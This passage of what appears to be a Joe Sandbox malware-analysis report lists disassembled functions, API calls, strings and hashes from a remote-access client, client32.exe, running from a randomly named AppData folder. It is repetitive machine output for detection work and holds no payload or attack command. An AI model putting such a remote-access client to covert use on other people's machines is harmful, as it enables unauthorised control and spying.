                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                • String ID: string too long
                                                                                                                                                                • API String ID: 2168136238-2556327735
                                                                                                                                                                • Opcode ID: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                                                                                                • Instruction ID: 8571876bfdcccba51c928a6a288fcd5c1e124ad980ef247a8f71a2e078b75a0c
                                                                                                                                                                • Opcode Fuzzy Hash: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                                                                                                • Instruction Fuzzy Hash: A731C732B14A104BF720DE9CE88095FF7EDEBE57A4B20061FE599C7640E7719C5083A1
                                                                                                                                                                Function 11147990 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _malloc
                                                                                                                                                                • String ID: ..\CTL32\uuencode.c$buf
                                                                                                                                                                • API String ID: 1579825452-878823822
                                                                                                                                                                • Opcode ID: 9748761f0e71b584dfb37bb6812815516f3fde91ed2f3762d79063b5ba84f5d8
                                                                                                                                                                • Instruction ID: 73ea6712212396b6a6fc606397e772e554f858908e38e2cc4dd0aee25463d80d
                                                                                                                                                                • Opcode Fuzzy Hash: 9748761f0e71b584dfb37bb6812815516f3fde91ed2f3762d79063b5ba84f5d8
                                                                                                                                                                • Instruction Fuzzy Hash: C2214CABE405411BD300097C9C905E6BB88CBA7138B3C4735E8EEC77C2F625E64E8791
                                                                                                                                                                Function 110416A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __wcstoi64
                                                                                                                                                                • String ID: Client$DisableKeys
                                                                                                                                                                • API String ID: 398114495-4218113505
                                                                                                                                                                • Opcode ID: 716cb09b3c2f6d142f2e5688581337e509dd50440af53e8e0f393a2c6f0442b6
                                                                                                                                                                • Instruction ID: 68ded752b5482f5f1f1707e51c7ff90776eef8c426e4aed6d9b84e4704bb1440
                                                                                                                                                                • Opcode Fuzzy Hash: 716cb09b3c2f6d142f2e5688581337e509dd50440af53e8e0f393a2c6f0442b6
                                                                                                                                                                • Instruction Fuzzy Hash: 0121787AF0424616E720CE249D80BAEBBF9AF45708F2440F9DCC987541EE32F506C791
                                                                                                                                                                Function 1108F2F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1108F38C
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1108F3A1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                • String ID: L
                                                                                                                                                                • API String ID: 1338273076-2909332022
                                                                                                                                                                • Opcode ID: ca3c9e43b94024294cee3a83bd0df657fbb186da9c2071d90ca30164a8257d44
                                                                                                                                                                • Instruction ID: a4fae97c5fdb08f5bbe7be2be84186cb3cec15bbd065a55e87689edd9833ea14
                                                                                                                                                                • Opcode Fuzzy Hash: ca3c9e43b94024294cee3a83bd0df657fbb186da9c2071d90ca30164a8257d44
                                                                                                                                                                • Instruction Fuzzy Hash: E73177B5D04259AFDB10DFA5C880BDEFBF8FB08754F04826DE915A7280D775A904CB51
                                                                                                                                                                Function 11041350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11041413
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                                                                                                Strings
                                                                                                                                                                • VolumeControl exception : %hs, xrefs: 11041431
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                • String ID: VolumeControl exception : %hs
                                                                                                                                                                • API String ID: 3728558374-910296547
                                                                                                                                                                • Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                                                                                                • Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
                                                                                                                                                                • Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                                                                                                • Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1
                                                                                                                                                                Function 1100F260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F27B
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                                                                                                  • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                                                                                                  • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F292
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                • String ID: string too long
                                                                                                                                                                • API String ID: 963545896-2556327735
                                                                                                                                                                • Opcode ID: 6b1525799c9edef334f4852062e8405e18519a63a5733119385c965e45330704
                                                                                                                                                                • Instruction ID: bb54faa7590d99a912cddc2b6cd1eeb78aa94a45d21c5f83dac251cd0972bc34
                                                                                                                                                                • Opcode Fuzzy Hash: 6b1525799c9edef334f4852062e8405e18519a63a5733119385c965e45330704
                                                                                                                                                                • Instruction Fuzzy Hash: EE119A377046544FE321D99CE880B6AF7E9EF956A4F20066FE59187650C7A1A84483A2
                                                                                                                                                                Function 110B9280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • ShowWindow.USER32(8D111939,00000009,?,?,?,?,?,?,?,?,?,?,110BA3E6,110BFEBC), ref: 110B92CB
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004C), ref: 110B8642
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004D), ref: 110B8649
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004E), ref: 110B8650
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(0000004F), ref: 110B8657
                                                                                                                                                                  • Part of subcall function 110B8610: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8666
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(?), ref: 110B8674
                                                                                                                                                                  • Part of subcall function 110B8610: GetSystemMetrics.USER32(00000001), ref: 110B8683
                                                                                                                                                                • MoveWindow.USER32(8D111939,?,?,?,?,00000001), ref: 110B92F3
                                                                                                                                                                Strings
                                                                                                                                                                • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B930D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                                                                                                • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                                                                                                • API String ID: 2940908497-693965840
                                                                                                                                                                • Opcode ID: eeba164e39b9a206ee0bd13021fe79c14c8f790cdcea3297abcc58d2d41d4cb3
                                                                                                                                                                • Instruction ID: ea8a17caf2cab53e8fa0eb5ee6ebbdabb1f0cf5c0d35e4c5ce58ed4944f537fe
                                                                                                                                                                • Opcode Fuzzy Hash: eeba164e39b9a206ee0bd13021fe79c14c8f790cdcea3297abcc58d2d41d4cb3
                                                                                                                                                                • Instruction Fuzzy Hash: FF21EA75B0060AAFDB08DFA8C995DBEF7B5FB88304F104668E51997354DA30BD01CBA4
                                                                                                                                                                Function 11049550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • inet_addr.WSOCK32(00000000,0000003E,?,?), ref: 11049611
                                                                                                                                                                • _free.LIBCMT ref: 11049619
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _freeinet_addr
                                                                                                                                                                • String ID: >
                                                                                                                                                                • API String ID: 1695503834-325317158
                                                                                                                                                                • Opcode ID: dce819e6e19835175f2eb2e805919a9a67d1191bb2d60a9b1a31f8b68dd0af42
                                                                                                                                                                • Instruction ID: 6df48fcaa37723547dabdf7cd208d39f8a2ff7905a2c9ebf3e4832579dd6b0ea
                                                                                                                                                                • Opcode Fuzzy Hash: dce819e6e19835175f2eb2e805919a9a67d1191bb2d60a9b1a31f8b68dd0af42
                                                                                                                                                                • Instruction Fuzzy Hash: 4B21F838D0025B8BDB11DF28D8907D9B7F4FF5A314F6484E9D8C8DB240EA756A89CB91
                                                                                                                                                                Function 111471A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                                                                                  • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\bpsFyf\client32.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                                                                                • _memmove.LIBCMT ref: 11147211
                                                                                                                                                                Strings
                                                                                                                                                                • Failed to get callstack, xrefs: 111471BD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentFileModuleNameProcess_memmove
                                                                                                                                                                • String ID: Failed to get callstack
                                                                                                                                                                • API String ID: 4135527288-766476014
                                                                                                                                                                • Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                                                                                                • Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
                                                                                                                                                                • Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                                                                                                • Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90
                                                                                                                                                                Function 11063090 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1106309F
                                                                                                                                                                  • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                                                                                                  • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                                                                                                • _swscanf.LIBCMT ref: 11063104
                                                                                                                                                                Strings
                                                                                                                                                                • %d %d %d %d %d %d %d %d %d, xrefs: 110630FE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memset$_malloc_swscanf
                                                                                                                                                                • String ID: %d %d %d %d %d %d %d %d %d
                                                                                                                                                                • API String ID: 226140750-2123045714
                                                                                                                                                                • Opcode ID: 4711e5a1c1c86c382dbc854a19b4131db48f5f8086dc55bfce866748364dfc87
